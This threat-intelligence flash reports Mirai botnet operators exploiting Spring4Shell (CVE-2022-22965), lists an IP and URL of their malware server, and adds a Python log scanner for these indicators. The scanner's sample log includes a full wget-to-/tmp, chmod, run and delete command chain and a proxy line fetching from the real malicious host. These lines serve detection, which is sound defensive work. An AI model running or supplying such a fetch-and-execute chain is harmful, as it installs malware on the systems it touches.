Spring4Shell CVE-2022-22965 Weaponized by Mirai Botnet

Researchers at Trend Micro Threat Research have observed active exploitation of the Spring4Shell vulnerability for the purpose of weaponizing and executing Mirai botnet malware. Spring4Shell (CVE-2022-22965) is a recently discovered vulnerability in the Spring Framework, a popular Java development platform. You can find our previous coverage of this vulnerability here.

Trend Micro researchers observed this adaptation of the Mirai botnet in early April in the Singapore region. The exploitation of the Spring Framework vulnerability allowed the Mirai operators to retrieve their malware from their own infrastructure using ‘wget’ to download the malicious executable into the ‘/tmp’ folder, change its permissions with ‘chmod’, and execute it. Multiple CPU architecture variants were also observed on the malware file server, including ARM, x86, and MIPS among others. Interestingly, the malicious script used to download the malware to the victim server downloads all of the available CPU architecture variants and attempts to run them all. The compatible ones will run, while the rest won’t. The files are all then removed after execution.

Analyst Notes

It is highly recommended that any system using the Spring Framework be patched to the most recent versions. You can find our coverage of the patches here.

Attackers are integrating exploits for newly disclosed vulnerabilities into their malware faster and faster, especially in the case of botnets, where the goal is to spread as widely as possible. It is more important than ever to maintain a disciplined, progressive patch cycle.

As seen in a vast number of attacks, the use of ‘wget’ and ‘curl’ is a very popular way for an adversary to easily download malware onto target systems. Unless there is a specific need for those tools, it is highly recommended that their installation and usage be heavily restricted.

Among other IOCs provided by Trend Micro in their report, the IP and URL that they discovered housing various versions of the malware would be useful and actionable items to look for in a network.

• 45.95.169[.]143
• http://45.95.169[.]143/The420smokeplace[.]dns/
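The following script is an added example and is not code from Trend Micro or from this flash. It shows one way to put the two items above to work: it refangs the published indicators and searches log lines for them, and it flags the download-and-run chain described in the report (wget or curl, a path under /tmp, and a chmod in the same command line). The log line format and the sample entries are constructed for the example; the download-chain rule is a hypothetical heuristic, not a vendor signature, and real deployments would tune it to their own shell-audit and proxy log formats.

```python
import re
from typing import List, Tuple

# Indicators published in the Trend Micro report, kept in the defanged form the
# flash uses so they cannot be clicked or resolved by accident.
DEFANGED_IOCS = [
    "45.95.169[.]143",
    "http://45.95.169[.]143/The420smokeplace[.]dns/",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the form that appears in logs."""
    return indicator.replace("[.]", ".").replace("hxxp://", "http://")


REFANGED_IOCS = [refang(i) for i in DEFANGED_IOCS]

# Hypothetical heuristic for the chain described in the flash: a fetch tool,
# a path under /tmp, and a chmod on the same command line.
FETCH_TOOL = re.compile(r"\b(?:wget|curl)\b")
TMP_PATH = re.compile(r"/tmp\b")
CHMOD = re.compile(r"\bchmod\b")


def match_iocs(line: str) -> List[str]:
    """Return every refanged IOC that occurs in the line."""
    return [ioc for ioc in REFANGED_IOCS if ioc in line]


def is_download_chain(line: str) -> bool:
    """True when a fetch tool, a /tmp path and chmod all appear in one line."""
    return bool(FETCH_TOOL.search(line) and TMP_PATH.search(line) and CHMOD.search(line))


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, reasons) for every line worth triaging."""
    findings = []
    for n, line in enumerate(lines, 1):
        reasons = []
        iocs = match_iocs(line)
        if iocs:
            reasons.append("ioc:" + ",".join(iocs))
        if is_download_chain(line):
            reasons.append("download-chain")
        if reasons:
            findings.append((n, reasons))
    return findings


# Constructed sample log lines (not real traffic); format is "timestamp source message".
SAMPLE_LOG = [
    # proxy entry fetching a binary from the file server named in the report
    "2022-04-05T10:00:01Z proxy src=10.0.0.12 GET http://45.95.169.143/The420smokeplace.dns/x86 200",
    # shell audit line matching the wget -> /tmp -> chmod -> run -> delete chain
    "2022-04-05T10:00:02Z host-12 sh: cd /tmp; wget http://198.51.100.7/bins/arm7 -O /tmp/arm7; "
    "chmod +x /tmp/arm7; /tmp/arm7; rm -f /tmp/arm7",
    # benign curl use: no /tmp path and no chmod
    "2022-04-05T10:01:00Z host-12 sh: curl -s https://updates.example.net/health",
    # benign chmod under /tmp without any fetch tool
    "2022-04-05T10:02:00Z host-12 sh: chmod 600 /tmp/session.lock",
]

if __name__ == "__main__":
    for line_no, reasons in scan(SAMPLE_LOG):
        print(f"line {line_no}: {'; '.join(reasons)}")
```

Running the block reports line 1 (both the IP and the URL indicator) and line 2 (the download chain) and stays quiet on the two benign lines. Matching on the refanged URL rather than only the IP lets the rule survive if the same host later serves other paths, while the chain heuristic catches the behaviour even when the infrastructure changes, which is why both checks are kept.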